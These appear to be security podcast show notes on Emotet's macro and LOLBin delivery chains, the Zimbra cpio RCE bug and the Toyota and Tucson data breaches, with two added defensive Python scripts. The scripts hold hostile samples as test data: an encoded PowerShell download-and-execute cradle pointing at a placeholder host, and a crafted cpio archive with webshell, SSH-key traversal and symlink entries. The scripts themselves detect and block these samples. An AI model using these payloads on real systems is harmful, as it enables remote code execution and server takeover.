Episode 30: October 10 2022

Links

https://www.bleepingcomputer.com/news/security/hackers-exploiting-unpatched-rce-bug-in-zimbra-collaboration-suite/?&web_view=true
https://thehackernews.com/2022/10/new-report-uncovers-emotets-delivery.html
https://thehackernews.com/2022/10/hackers-exploiting-unpatched-rce-flaw.html
https://gizmodo.com/toyota-warns-customers-they-may-get-scam-emails-after-d-1849630698
https://www.bleepingcomputer.com/news/security/city-of-tucson-discloses-data-breach-affecting-over-123-000-people/

Emotet’s Current Tactics

  • Emotet
    • June 2014
      • First appeared as a banking trojan
    • 2016
      • Evolved into an all-purpose loader that delivers other malware, including ransomware
    • Jan 2021
      • Infrastructure taken down by law enforcement
    • Currently
      • Run by Mummy Spider (TA542)
    • Tactics
      • It has survived this long because it is versatile
      • Uses different attack vectors
      • Can stay dormant for long periods of time
      • Relies on emails carrying malicious attachments
    • Current delivery chains
      • VMware observed three different attack chains
        • Excel macro
        • Excel macro with PowerShell
        • Visual Basic for Applications (VBA) macro with PowerShell
        • Some used mshta.exe to launch a malicious HTA file
        • About a quarter of the attacks arrived as Excel documents
      • LOLBins (living-off-the-land binaries)
        • Popular tactic
          • mshta.exe and PowerShell
          • Signed by Microsoft
          • Trusted by Windows, so their execution blends in with normal activity
        • March to June 2022
          • Utilizing the Epoch 5 command-and-control infrastructure
          • New plugins
            • Designed to capture credit card data from the Google Chrome browser
            • A spreader module that uses the SMB protocol for lateral movement
            • A spamming module
            • An account info stealer for Outlook and Thunderbird
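The chains above (Office macro spawning mshta.exe or PowerShell, often with a hidden window and a base64-encoded command) are exactly what a process-creation hunt should catch. The script below is an added example written for these notes, not VMware's or any vendor's detection logic. It runs three rules over constructed Sysmon-style process-creation lines (the hostnames, file paths and URL are made up for the example): Office parent spawning a LOLBin child, mshta.exe launching an HTA or inline script, and PowerShell with hidden/encoded/download flags, decoding the `-enc` payload so the analyst sees what the macro actually ran.

```python
import base64
import re

# Constructed process-creation events (Sysmon Event ID 1 style) flattened to
# "timestamp|host|parent_image|image|command_line". Hosts, paths and the URL
# are invented for this example, not taken from any real Emotet sample.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/e.ps1')"
    .encode("utf-16-le")).decode()          # PowerShell -enc expects UTF-16LE base64

SAMPLE_EVENTS = [
    r"2022-10-03T09:14:22Z|WS-042|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|C:\Windows\System32\mshta.exe|mshta C:\Users\bob\AppData\Local\Temp\rad91A2.hta",
    r"2022-10-03T09:16:05Z|WS-017|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell -w hidden -nop -enc " + ENCODED,
    r"2022-10-03T09:20:41Z|WS-099|C:\Windows\explorer.exe"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell -NoProfile Get-ChildItem C:\Users\alice\Documents",
    r"2022-10-03T09:21:00Z|WS-099|C:\Windows\System32\services.exe"
    r"|C:\Windows\System32\svchost.exe|C:\Windows\System32\svchost.exe -k netsvcs",
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBIN_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                   "cscript.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
SUSPICIOUS_PS = re.compile(
    r"(?i)(-e(?:c|nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden|-nop\b"
    r"|downloadstring|invoke-webrequest|\biex\b|frombase64string)")
HTA_LAUNCH = re.compile(r"(?i)\.hta\b|https?://|vbscript:|javascript:")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -enc/-ec/-EncodedCommand argument, or None."""
    m = re.search(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Apply the three rules to one event; return a list of human-readable findings."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    cmd = event["command_line"]
    findings = []
    if parent in OFFICE and child in LOLBIN_CHILDREN:
        findings.append(f"office app {parent} spawned {child} (macro -> LOLBin)")
    if child == "mshta.exe" and HTA_LAUNCH.search(cmd):
        findings.append("mshta.exe launching HTA/inline script (T1218.005)")
    if child in {"powershell.exe", "pwsh.exe"}:
        if SUSPICIOUS_PS.search(cmd):
            findings.append("powershell with hidden/encoded/download flags (T1059.001)")
        decoded = decode_encoded_command(cmd)
        if decoded:
            findings.append(f"decoded -enc payload: {decoded}")
    return findings


def parse_event(line):
    ts, host, parent, image, cmd = line.split("|", 4)   # command line may contain '|'
    return {"timestamp": ts, "host": host, "parent_image": parent,
            "image": image, "command_line": cmd}


def hunt(lines):
    """Run analyze() over every line; return only the events that produced findings."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        findings = analyze(ev)
        if findings:
            alerts.append({"timestamp": ev["timestamp"], "host": ev["host"],
                           "image": basename(ev["image"]), "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["timestamp"], alert["host"], alert["image"])
        for finding in alert["findings"]:
            print("   -", finding)
```

Two of the four constructed events fire: the Excel-to-mshta chain and the Excel-to-PowerShell chain whose decoded payload is a download cradle; the admin's `Get-ChildItem` and the service host stay quiet. The parent-process rule is the most durable of the three, since Emotet can rename or re-encode its payload but the macro still has to spawn something from the Office process.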

Zimbra’s Unpatched RCE Flaw

  • Actively exploited (CVE-2022-41352)
    • CVSS 9.8
    • Allows an unauthenticated attacker to write arbitrary files on the server, leading to remote code execution
    • Lies in how Zimbra's antivirus/content filter (Amavis) extracts archived attachments
    • Sept 2022
      • No fix yet
      • Zimbra urges admins to install the pax utility and restart the Zimbra services
    • If the pax package is not installed, Amavis falls back to using cpio to extract archives
      • cpio lets an unauthenticated attacker create and overwrite files on the Zimbra server
        • including the Zimbra webroot
      • Affected versions
        • 8.8.15 and 9.0
        • On Linux distributions where pax is not installed by default
          • Oracle Linux 8
          • Red Hat Enterprise Linux 8
          • Rocky Linux 8
          • CentOS 8
        • Exception
          • Ubuntu
            • pax is already installed by default
      • Tactic
        • Email an archive file (CPIO or TAR) to a susceptible server
          • Amavis inspects the attachment by extracting its contents with the cpio archiver
          • cpio has no mode in which it can be safely used on untrusted archives
          • So an attacker can write to any path on the filesystem that the Zimbra user can access
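The whole bug is that an archive entry's path is trusted at extraction time. The script below is an added example for these notes, not Zimbra's or Amavis's code: it writes a constructed SVR4 "newc" cpio attachment containing the kinds of entries an attacker would mail (an absolute path into the webroot, a `../` traversal, and a symlink that later entries could write through), parses it with a minimal newc reader, and extracts it with the path checks that cpio itself does not apply. The webroot path and file names are assumed for illustration and are not from any real sample.

```python
import os
import stat
import tempfile

NEWC_MAGIC = b"070701"
HEADER_LEN = 110


def newc_entry(name, data=b"", mode=stat.S_IFREG | 0o644):
    """Serialise one SVR4 'newc' cpio entry (the format `cpio -o -H newc` writes)."""
    name_b = name.encode() + b"\0"
    # ino, mode, uid, gid, nlink, mtime, filesize, devmajor, devminor,
    # rdevmajor, rdevminor, namesize, check: 13 fields of 8 hex digits each
    fields = [0, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
    out = NEWC_MAGIC + "".join(f"{v:08x}" for v in fields).encode() + name_b
    out += b"\0" * (-len(out) % 4)           # header + name padded to 4 bytes
    out += data + b"\0" * (-len(data) % 4)   # data padded to 4 bytes
    return out


def newc_archive(entries):
    """entries: iterable of (name, data, mode); the TRAILER!!! record closes the archive."""
    return b"".join(newc_entry(*e) for e in entries) + newc_entry("TRAILER!!!")


def parse_newc(blob):
    """Walk a newc archive, yielding (name, mode, data) until the trailer."""
    off = 0
    while True:
        hdr = blob[off:off + HEADER_LEN]
        if hdr[:6] != NEWC_MAGIC:
            raise ValueError(f"bad cpio header at offset {off}")
        f = [int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in range(13)]
        mode, size, namesize = f[1], f[6], f[11]
        name = blob[off + HEADER_LEN:off + HEADER_LEN + namesize - 1].decode()
        off += HEADER_LEN + namesize
        off += -off % 4
        data = blob[off:off + size]
        off += size + (-size % 4)
        if name == "TRAILER!!!":
            return
        yield name, mode, data


def safe_extract(blob, dest):
    """Write only entries that stay inside dest; return (accepted, {rejected: reason})."""
    dest_real = os.path.realpath(dest)
    accepted, rejected = [], {}
    for name, mode, data in parse_newc(blob):
        if os.path.isabs(name):
            rejected[name] = "absolute path"
            continue
        if ".." in name.split("/"):
            rejected[name] = "parent-directory traversal"
            continue
        if stat.S_ISLNK(mode):
            rejected[name] = "symlink (later entries could write through it)"
            continue
        target = os.path.realpath(os.path.join(dest_real, name))
        if os.path.commonpath([dest_real, target]) != dest_real:
            rejected[name] = "resolves outside extraction dir"
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as fh:
            fh.write(data)
        accepted.append(name)
    return accepted, rejected


def demo():
    """Build the constructed attachment and extract it into a scratch directory."""
    webroot = "/opt/zimbra/jetty/webapps/zimbra"   # assumed ZCS webroot, illustrative
    attachment = newc_archive([
        ("invoice/summary.txt", b"harmless text", stat.S_IFREG | 0o644),
        (f"{webroot}/shell.jsp", b"<%-- webshell --%>", stat.S_IFREG | 0o644),
        ("../../../../opt/zimbra/.ssh/authorized_keys", b"ssh-ed25519 AAAA...",
         stat.S_IFREG | 0o600),
        ("out", b"/opt/zimbra", stat.S_IFLNK | 0o777),   # symlink: data is the target
    ])
    with tempfile.TemporaryDirectory() as tmp:
        accepted, rejected = safe_extract(attachment, tmp)
        written = sorted(os.path.relpath(os.path.join(d, f), tmp)
                         for d, _, files in os.walk(tmp) for f in files)
    return accepted, rejected, written


if __name__ == "__main__":
    acc, rej, files = demo()
    print("accepted:", acc)
    for name, why in rej.items():
        print("rejected:", name, "->", why)
    print("on disk:", files)
```

Only `invoice/summary.txt` lands on disk; the three hostile entries are refused before anything is written. The symlink rule is the one people forget: refusing `..` and leading `/` is not enough if an earlier entry can plant a symlink that a later, innocent-looking relative path then follows, which is why a `realpath` check against the destination is done on every entry rather than a one-time string check on the name.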

Toyota Customers prepare for Phishing

  • Toyota
    • Customer information leaked
      • About 296,000 customer records exposed
      • Users of Toyota's T-Connect smartphone app
    • Warned customers
      • Risk of phishing and spam emails
    • Leak
      • Customers who registered with an email address since July 2017
      • Email addresses and customer management numbers
      • No sensitive information
        • No names, phone numbers or credit card numbers
        • Though the exposed data could be correlated with other leaks online
      • No reports so far of the data being misused
    • Contractor
      • Third-party development subcontractor
        • Accidentally published part of the app's source code to a public repository; the code contained an access key to the server holding the customer data
        • Exposed from Dec 2017 until Sept 2022
        • No unauthorized access detected at this time

City of Tucson discloses data breach

  • City of Tucson
    • Data breach
    • Personal information
      • 123,000 people affected
      • Names and Social Security numbers, driver's license or state identification numbers, and passport numbers
    • Attack
      • May 17 to May 31
        • Attacker had access to the city's network
        • May 29: the City learned of malicious activity on a user account
      • Aug 4
        • Learned that documents may have been copied
      • Sept 12
        • Review of the affected documents concluded and identified the personal information involved
      • Sept 23
        • Notification of residents
      • The attacker breached the city's network and exfiltrated a large number of files containing sensitive information
    • Nothing detected so far
      • No misuse of the information has been detected
      • Affected residents get 12 months of free access to Experian credit monitoring